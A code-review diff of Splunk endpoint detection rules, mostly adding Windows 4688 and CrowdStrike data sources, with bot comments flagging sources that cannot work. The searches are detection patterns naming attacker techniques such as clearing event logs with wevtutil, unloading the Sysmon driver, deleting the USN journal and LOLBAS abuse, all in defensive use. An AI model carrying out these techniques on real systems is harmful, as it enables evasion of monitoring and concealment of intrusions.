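Review bot: The search keys on `Processes.original_file_name=Microsoft.Workflow.Compiler.exe`, a value taken from the binary's PE version resource, and Security event 4688 does not carry an original file name (it reports the new process path, creator process and, optionally, the command line). Listing 4688 as a data source therefore promises coverage that cannot exist: 4688-backed events will have a null `original_file_name` and the rename detection will silently never match. I would remove `- Windows Event Log Security 4688` here, or add a sentence to `how_to_implement` stating that this analytic requires a source that populates `original_file_name` (Sysmon, or an EDR that exposes it). The rest of the search is outside this hunk.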
diff --git a/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml b/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml
index 56b154229c..efc1b7bd41 100644
--- a/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml
+++ b/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the usage of microsoft.workflow.c
further compromise of the system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_microsoftworkflowcompiler`
by Processes.dest Processes.parent_process Processes.process_name Processes.original_file_name
diff --git a/detections/endpoint/suspicious_msbuild_path.yml b/detections/endpoint/suspicious_msbuild_path.yml
index 8ce76cd24a..cbf33a061c 100644
--- a/detections/endpoint/suspicious_msbuild_path.yml
+++ b/detections/endpoint/suspicious_msbuild_path.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of msbuild.exe from a
arbitrary code, potentially leading to system compromise and further malicious activities.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process_name)
as process_name values(Processes.process) as process min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_msbuild` AND (Processes.process_path!=*\\framework*\\v*\\*)
diff --git a/detections/endpoint/suspicious_msbuild_rename.yml b/detections/endpoint/suspicious_msbuild_rename.yml
index 4d0bf6139e..3151e43ca5 100644
--- a/detections/endpoint/suspicious_msbuild_rename.yml
+++ b/detections/endpoint/suspicious_msbuild_rename.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of renamed instances o
network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name!=msbuild.exe
AND Processes.original_file_name=MSBuild.exe by Processes.dest Processes.user Processes.parent_process_name
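Review bot: This rename detection depends on `Processes.original_file_name=MSBuild.exe`, and Windows Security 4688 does not include the PE original file name, so 4688 events can never satisfy the filter. Adding `- Windows Event Log Security 4688` here advertises a source on which the detection is guaranteed to produce nothing. Either remove that entry or document in `how_to_implement` that `original_file_name` must be populated by the endpoint source (Sysmon or an EDR that exposes it). The remainder of the search is beyond this hunk.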
diff --git a/detections/endpoint/suspicious_msbuild_spawn.yml b/detections/endpoint/suspicious_msbuild_spawn.yml
index 2effe22e78..b5f7878d19 100644
--- a/detections/endpoint/suspicious_msbuild_spawn.yml
+++ b/detections/endpoint/suspicious_msbuild_spawn.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where wmiprvse.exe spaw
system compromise or further malicious activities.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process_name)
as process_name values(Processes.process) as process min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=wmiprvse.exe
diff --git a/detections/endpoint/suspicious_mshta_child_process.yml b/detections/endpoint/suspicious_mshta_child_process.yml
index 8590a0251f..c392117799 100644
--- a/detections/endpoint/suspicious_mshta_child_process.yml
+++ b/detections/endpoint/suspicious_mshta_child_process.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies child processes spawned from "msh
"mshta.exe" for malicious purposes.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process_name)
as process_name values(Processes.process) as process min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=mshta.exe
diff --git a/detections/endpoint/suspicious_mshta_spawn.yml b/detections/endpoint/suspicious_mshta_spawn.yml
index 5cd24fa16f..4bcdb845fa 100644
--- a/detections/endpoint/suspicious_mshta_spawn.yml
+++ b/detections/endpoint/suspicious_mshta_spawn.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the spawning of mshta.exe by wmiprvs
activities.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process_name)
as process_name values(Processes.process) as process min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=svchost.exe
diff --git a/detections/endpoint/suspicious_plistbuddy_usage.yml b/detections/endpoint/suspicious_plistbuddy_usage.yml
index 336f2ba446..096d7654b2 100644
--- a/detections/endpoint/suspicious_plistbuddy_usage.yml
+++ b/detections/endpoint/suspicious_plistbuddy_usage.yml
@@ -15,6 +15,8 @@ description: 'The following analytic identifies the use of the native macOS util
on the compromised macOS system.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=PlistBuddy
(Processes.process=*LaunchAgents* OR Processes.process=*RunAtLoad* OR Processes.process=*true*)
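Review bot: `Windows Event Log Security 4688` cannot source a detection of the macOS `PlistBuddy` utility, so the added line is wrong for this analytic; the description on the previous lines explicitly scopes it to macOS. CrowdStrike ProcessRollup2 does report macOS process execution and is fine to keep. I would drop the 4688 entry so the metadata does not claim Windows audit logs can surface macOS LaunchAgent tampering.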
diff --git a/detections/endpoint/suspicious_process_executed_from_container_file.yml b/detections/endpoint/suspicious_process_executed_from_container_file.yml
index 61a49ede77..2b223dad30 100644
--- a/detections/endpoint/suspicious_process_executed_from_container_file.yml
+++ b/detections/endpoint/suspicious_process_executed_from_container_file.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies a suspicious process executed fro
privileges, or persist within the environment, posing a significant security risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process_name)
as process_name min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where Processes.process IN ("*.ZIP\\*","*.ISO\\*","*.IMG\\*","*.CAB\\*","*.TAR\\*","*.GZ\\*","*.RAR\\*","*.7Z\\*")
diff --git a/detections/endpoint/suspicious_process_file_path.yml b/detections/endpoint/suspicious_process_file_path.yml
index 838a902c60..183bce4670 100644
--- a/detections/endpoint/suspicious_process_file_path.yml
+++ b/detections/endpoint/suspicious_process_file_path.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies processes running from file paths
and further malicious activities within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process_name)
as process_name values(Processes.process) as process min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_path = "*\\windows\\fonts\\*"
diff --git a/detections/endpoint/suspicious_reg_exe_process.yml b/detections/endpoint/suspicious_reg_exe_process.yml
index 5f33d5b64c..6cfea57cca 100644
--- a/detections/endpoint/suspicious_reg_exe_process.yml
+++ b/detections/endpoint/suspicious_reg_exe_process.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies instances of reg.exe being launch
or persistent access.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Processes where Processes.parent_process_name
!= explorer.exe Processes.process_name =cmd.exe by Processes.user Processes.process_name
diff --git a/detections/endpoint/suspicious_regsvr32_register_suspicious_path.yml b/detections/endpoint/suspicious_regsvr32_register_suspicious_path.yml
index 76158d6124..100fc1b120 100644
--- a/detections/endpoint/suspicious_regsvr32_register_suspicious_path.yml
+++ b/detections/endpoint/suspicious_regsvr32_register_suspicious_path.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of Regsvr32.exe to register
or further lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` Processes.process
IN ("*\\appdata\\*", "*\\programdata\\*","*\\windows\\temp\\*") NOT (Processes.process
diff --git a/detections/endpoint/suspicious_rundll32_dllregisterserver.yml b/detections/endpoint/suspicious_rundll32_dllregisterserver.yml
index c5697dbc90..7ac0a8e5db 100644
--- a/detections/endpoint/suspicious_rundll32_dllregisterserver.yml
+++ b/detections/endpoint/suspicious_rundll32_dllregisterserver.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of rundll32.exe with t
persistence within the environment, posing a severe security risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*dllregisterserver*
by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/suspicious_rundll32_no_command_line_arguments.yml b/detections/endpoint/suspicious_rundll32_no_command_line_arguments.yml
index c765ae417e..2e6f02d75c 100644
--- a/detections/endpoint/suspicious_rundll32_no_command_line_arguments.yml
+++ b/detections/endpoint/suspicious_rundll32_no_command_line_arguments.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of rundll32.exe withou
file writes, or other malicious actions.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where `process_rundll32` by _time span=1h Processes.process_id Processes.process_name
Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name
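Review bot: A detection whose whole premise is "rundll32 with no command-line arguments" is sensitive to sources that omit the command line, and Security 4688 only populates `CommandLine` when the "Include command line in process creation events" audit setting is enabled; on hosts where it is not, every 4688 rundll32 event arrives with an empty `Processes.process`. Depending on how the argument check (outside this hunk) is written, that either produces an alert for every benign rundll32 launch or never matches at all. Adding `- Windows Event Log Security 4688` should come with a `how_to_implement` note such as `Security 4688 is only a valid source when process command-line auditing is enabled; without it this analytic will misfire on argument-less events.`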
diff --git a/detections/endpoint/suspicious_rundll32_plugininit.yml b/detections/endpoint/suspicious_rundll32_plugininit.yml
index e4b5a30ee4..5aead75ded 100644
--- a/detections/endpoint/suspicious_rundll32_plugininit.yml
+++ b/detections/endpoint/suspicious_rundll32_plugininit.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies the execution of the rundll32.exe
further malware infections, data exfiltration, or complete system compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*PluginInit*
by Processes.process_name Processes.process Processes.parent_process_name Processes.original_file_name
diff --git a/detections/endpoint/suspicious_rundll32_startw.yml b/detections/endpoint/suspicious_rundll32_startw.yml
index f8b24376d3..51d99dfeca 100644
--- a/detections/endpoint/suspicious_rundll32_startw.yml
+++ b/detections/endpoint/suspicious_rundll32_startw.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of rundll32.exe wit
maintain persistence within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*start*
by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/suspicious_scheduled_task_from_public_directory.yml b/detections/endpoint/suspicious_scheduled_task_from_public_directory.yml
index 230691fe2e..bac243e316 100644
--- a/detections/endpoint/suspicious_scheduled_task_from_public_directory.yml
+++ b/detections/endpoint/suspicious_scheduled_task_from_public_directory.yml
@@ -15,6 +15,8 @@ description: 'The following analytic identifies the creation of scheduled tasks
within the network.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe
(Processes.process=*\\users\\public\\* OR Processes.process=*\\programdata\\* OR
diff --git a/detections/endpoint/suspicious_searchprotocolhost_no_command_line_arguments.yml b/detections/endpoint/suspicious_searchprotocolhost_no_command_line_arguments.yml
index bbd7412255..22de13f058 100644
--- a/detections/endpoint/suspicious_searchprotocolhost_no_command_line_arguments.yml
+++ b/detections/endpoint/suspicious_searchprotocolhost_no_command_line_arguments.yml
@@ -15,6 +15,8 @@ description: The following analytic detects instances of searchprotocolhost.exe
credential dumping, or other malicious actions within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where Processes.process_name=searchprotocolhost.exe by _time span=1h Processes.process_id
Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process
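Review bot: As with the other "no command line arguments" analytics, listing Security 4688 here is only safe when command-line auditing is enabled on the endpoints; otherwise `Processes.process` is empty for every 4688-sourced searchprotocolhost.exe launch and the argument check later in the search (outside this hunk) will either fire on all of them or on none. A one-line `how_to_implement` caveat about the required audit policy would make the new data source honest. CrowdStrike ProcessRollup2 includes the command line and needs no such caveat.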
diff --git a/detections/endpoint/suspicious_sqlite3_lsquarantine_behavior.yml b/detections/endpoint/suspicious_sqlite3_lsquarantine_behavior.yml
index 97e8ce4886..d5317a10ef 100644
--- a/detections/endpoint/suspicious_sqlite3_lsquarantine_behavior.yml
+++ b/detections/endpoint/suspicious_sqlite3_lsquarantine_behavior.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the use of SQLite3 querying the M
or persistent adware infections.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=sqlite3
Processes.process=*LSQuarantine* by Processes.dest Processes.user Processes.parent_process
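Review bot: `Windows Event Log Security 4688` is not a valid source for this macOS-only analytic; the filter on `sqlite3` querying `LSQuarantine` only makes sense for macOS process telemetry, as the description states. Keep `- CrowdStrike ProcessRollup2` (which covers macOS) and remove the 4688 line so users are not told a Windows audit channel can feed this detection.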
diff --git a/detections/endpoint/suspicious_wav_file_in_appdata_folder.yml b/detections/endpoint/suspicious_wav_file_in_appdata_folder.yml
index b05b86bfc6..c760f75277 100644
--- a/detections/endpoint/suspicious_wav_file_in_appdata_folder.yml
+++ b/detections/endpoint/suspicious_wav_file_in_appdata_folder.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the creation of .wav files in the Ap
the affected system's confidentiality.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
- Sysmon EventID 11
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where Processes.process_name=*.exe Processes.process_path="*\\appdata\\Roaming\\*"
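Review bot: This hunk keeps `Sysmon EventID 1` and `Sysmon EventID 11` as two separate entries with the new 4688 and CrowdStrike lines inserted between them, whereas the sibling analytic `suspicious_image_creation_in_appdata_folder.yml` in this same change, whose `search` begins with exactly the same Processes filter, collapses the pair into one `Sysmon EventID 1 AND Sysmon EventID 11` entry. Pick one convention for detections that correlate process and file events, and group related entries together (for example Sysmon 1, Sysmon 11, then the alternative process sources) so the file-creation requirement is not visually separated from its process-creation counterpart.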
diff --git a/detections/endpoint/suspicious_wevtutil_usage.yml b/detections/endpoint/suspicious_wevtutil_usage.yml
index 33f88b93b9..d7b523fc14 100644
--- a/detections/endpoint/suspicious_wevtutil_usage.yml
+++ b/detections/endpoint/suspicious_wevtutil_usage.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the usage of wevtutil.exe with param
and understand the full scope of the compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where Processes.process_name=wevtutil.exe Processes.process IN ("* cl *", "*clear-log*")
diff --git a/detections/endpoint/suspicious_writes_to_windows_recycle_bin.yml b/detections/endpoint/suspicious_writes_to_windows_recycle_bin.yml
index defc4d90ed..a7eaa48cd9 100644
--- a/detections/endpoint/suspicious_writes_to_windows_recycle_bin.yml
+++ b/detections/endpoint/suspicious_writes_to_windows_recycle_bin.yml
@@ -8,8 +8,7 @@ type: TTP
description: |-
The following analytic detects when a process other than explorer.exe writes to the Windows Recycle Bin. It leverages the Endpoint.Filesystem and Endpoint.Processes data models in Splunk to identify any process writing to the "*$Recycle.Bin*" file path, excluding explorer.exe. This activity is significant because it may indicate an attacker attempting to hide their actions, potentially leading to data theft, ransomware, or other malicious outcomes. If confirmed malicious, this behavior could allow an attacker to persist in the environment and evade detection by security tools.
data_source:
-- Sysmon EventID 1
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime values(Filesystem.file_path) as file_path values(Filesystem.file_name)
as file_name FROM datamodel=Endpoint.Filesystem where Filesystem.file_path = "*$Recycle.Bin*"
diff --git a/detections/endpoint/svchost_lolbas_execution_process_spawn.yml b/detections/endpoint/svchost_lolbas_execution_process_spawn.yml
index f6aa015e9e..233f1b41a3 100644
--- a/detections/endpoint/svchost_lolbas_execution_process_spawn.yml
+++ b/detections/endpoint/svchost_lolbas_execution_process_spawn.yml
@@ -15,6 +15,8 @@ description: The following analytic detects instances of 'svchost.exe' spawning
persistence within the environment, posing a significant security risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=svchost.exe)
(Processes.process_name IN ("Regsvcs.exe", "Ftp.exe", "OfflineScannerShell.exe",
diff --git a/detections/endpoint/system_info_gathering_using_dxdiag_application.yml b/detections/endpoint/system_info_gathering_using_dxdiag_application.yml
index db166e66b2..6ac1bc2106 100644
--- a/detections/endpoint/system_info_gathering_using_dxdiag_application.yml
+++ b/detections/endpoint/system_info_gathering_using_dxdiag_application.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of the dxdiag.exe p
further exploitation or lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_dxdiag` AND Processes.process
= "* /t *" by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/system_information_discovery_detection.yml b/detections/endpoint/system_information_discovery_detection.yml
index 4e5fa399e2..5889bf05c9 100644
--- a/detections/endpoint/system_information_discovery_detection.yml
+++ b/detections/endpoint/system_information_discovery_detection.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies system information discovery tech
privilege escalation, persistence, or data exfiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process="*wmic* qfe*"
OR Processes.process=*systeminfo* OR Processes.process=*hostname*) by Processes.user
diff --git a/detections/endpoint/system_processes_run_from_unexpected_locations.yml b/detections/endpoint/system_processes_run_from_unexpected_locations.yml
index c446396c02..a9c8c5d032 100644
--- a/detections/endpoint/system_processes_run_from_unexpected_locations.yml
+++ b/detections/endpoint/system_processes_run_from_unexpected_locations.yml
@@ -14,6 +14,8 @@ description: 'The following analytic identifies system processes running from un
persistence within the environment, posing a significant security risk.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Processes where Processes.process_path !="C:\\Windows\\System32*"
Processes.process_path !="C:\\Windows\\SysWOW64*" by Processes.dest Processes.user
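Review bot: The search excludes only paths matching the drive-letter-anchored literals `C:\\Windows\\System32*` and `C:\\Windows\\SysWOW64*`, and CrowdStrike ProcessRollup2 typically reports the image path as a device path (`\Device\HarddiskVolumeN\Windows\System32\...`) rather than `C:\...`, unless the add-on normalizes it. If it does not, adding `- CrowdStrike ProcessRollup2` as a source means no system process is ever excluded and the analytic will flag every process on every CrowdStrike-sourced host. Either confirm the normalization or loosen the exclusions to a wildcard prefix, e.g. `Processes.process_path !="*\\Windows\\System32*"` and `Processes.process_path !="*\\Windows\\SysWOW64*"`. The rest of the search is outside this hunk.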
diff --git a/detections/endpoint/system_user_discovery_with_query.yml b/detections/endpoint/system_user_discovery_with_query.yml
index 0ee1d19535..14ae5099f4 100644
--- a/detections/endpoint/system_user_discovery_with_query.yml
+++ b/detections/endpoint/system_user_discovery_with_query.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of `query.exe` with co
aiding in further lateral movement and privilege escalation within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="query.exe")
(Processes.process=*user*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/system_user_discovery_with_whoami.yml b/detections/endpoint/system_user_discovery_with_whoami.yml
index 20c9d2afc6..23ac3bf748 100644
--- a/detections/endpoint/system_user_discovery_with_whoami.yml
+++ b/detections/endpoint/system_user_discovery_with_whoami.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `whoami.exe` withou
the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="whoami.exe")
by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/time_provider_persistence_registry.yml b/detections/endpoint/time_provider_persistence_registry.yml
index 3cfee5f93b..08637f9b05 100644
--- a/detections/endpoint/time_provider_persistence_registry.yml
+++ b/detections/endpoint/time_provider_persistence_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects suspicious modifications to the time
automatically upon system boot, potentially leading to further exploitation and
control over the affected system.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path="*\\CurrentControlSet\\Services\\W32Time\\TimeProviders*")
diff --git a/detections/endpoint/uninstall_app_using_msiexec.yml b/detections/endpoint/uninstall_app_using_msiexec.yml
index 3a5f4eb570..9477ed70f1 100644
--- a/detections/endpoint/uninstall_app_using_msiexec.yml
+++ b/detections/endpoint/uninstall_app_using_msiexec.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the uninstallation of applications u
the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=msiexec.exe
Processes.process= "* /qn *" Processes.process= "*/X*" Processes.process= "*REBOOT=*"
diff --git a/detections/endpoint/unknown_process_using_the_kerberos_protocol.yml b/detections/endpoint/unknown_process_using_the_kerberos_protocol.yml
index 6e7650ccd9..edc7472aa2 100644
--- a/detections/endpoint/unknown_process_using_the_kerberos_protocol.yml
+++ b/detections/endpoint/unknown_process_using_the_kerberos_protocol.yml
@@ -14,7 +14,7 @@ description: The following analytic identifies a non-lsass.exe process making an
an adversary attempting to abuse the Kerberos protocol, potentially leading to unauthorized
access or lateral movement within the network.
data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 3
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where Processes.process_name!=lsass.exe by _time Processes.process_id Processes.process_name
Processes.dest Processes.process_path Processes.process Processes.parent_process_name
diff --git a/detections/endpoint/unload_sysmon_filter_driver.yml b/detections/endpoint/unload_sysmon_filter_driver.yml
index cf0bb0a7ce..c3d901f658 100644
--- a/detections/endpoint/unload_sysmon_filter_driver.yml
+++ b/detections/endpoint/unload_sysmon_filter_driver.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of `fltMC.exe` to unload the
data breaches, privilege escalation, or persistent access within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime values(Processes.process)
as process max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=fltMC.exe
AND Processes.process=*unload* AND Processes.process=*SysmonDrv* by Processes.process_name
diff --git a/detections/endpoint/unusually_long_command_line.yml b/detections/endpoint/unusually_long_command_line.yml
index 7e44a8e57c..6db35490b6 100644
--- a/detections/endpoint/unusually_long_command_line.yml
+++ b/detections/endpoint/unusually_long_command_line.yml
@@ -9,6 +9,8 @@ description: |-
The following analytic detects unusually long command lines, which may indicate malicious activity. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on the length of command lines executed on hosts. This behavior is significant because attackers often use obfuscated or complex command lines to evade detection and execute malicious payloads. If confirmed malicious, this activity could lead to data theft, ransomware deployment, or further system compromise. Analysts should investigate the source and content of the command line, inspect relevant artifacts, and review concurrent processes to identify potential threats.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Processes by Processes.user Processes.dest Processes.process_name
Processes.process | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)`|
diff --git a/detections/endpoint/unusually_long_command_line___mltk.yml b/detections/endpoint/unusually_long_command_line___mltk.yml
index e0585e47eb..0581f36735 100644
--- a/detections/endpoint/unusually_long_command_line___mltk.yml
+++ b/detections/endpoint/unusually_long_command_line___mltk.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies unusually long command lines exec
to unauthorized access, data exfiltration, or further compromise of the system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Processes by Processes.user Processes.dest Processes.process_name
Processes.process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`|
diff --git a/detections/endpoint/user_discovery_with_env_vars_powershell.yml b/detections/endpoint/user_discovery_with_env_vars_powershell.yml
index bf025c6f7c..82bcb5d5f3 100644
--- a/detections/endpoint/user_discovery_with_env_vars_powershell.yml
+++ b/detections/endpoint/user_discovery_with_env_vars_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
and lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
(Processes.process="*$env:UserName*" OR Processes.process="*[System.Environment]::UserName*")
diff --git a/detections/endpoint/usn_journal_deletion.yml b/detections/endpoint/usn_journal_deletion.yml
index af019c6418..8c07f82226 100644
--- a/detections/endpoint/usn_journal_deletion.yml
+++ b/detections/endpoint/usn_journal_deletion.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the deletion of the USN Journal usin
modifications and potentially compromising incident response efforts.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process)
as process values(Processes.parent_process) as parent_process min(_time) as firstTime
max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=fsutil.exe
diff --git a/detections/endpoint/vbscript_execution_using_wscript_app.yml b/detections/endpoint/vbscript_execution_using_wscript_app.yml
index c6ed45174a..edf4a61aaf 100644
--- a/detections/endpoint/vbscript_execution_using_wscript_app.yml
+++ b/detections/endpoint/vbscript_execution_using_wscript_app.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of VBScript using the
data exfiltration, or further lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name
= "wscript.exe" AND Processes.parent_process = "*//e:vbscript*") OR (Processes.process_name
diff --git a/detections/endpoint/verclsid_clsid_execution.yml b/detections/endpoint/verclsid_clsid_execution.yml
index 5fcbc96f83..f13a64bca5 100644
--- a/detections/endpoint/verclsid_clsid_execution.yml
+++ b/detections/endpoint/verclsid_clsid_execution.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the potential abuse of the verclsid.
to system compromise or further malicious activities.
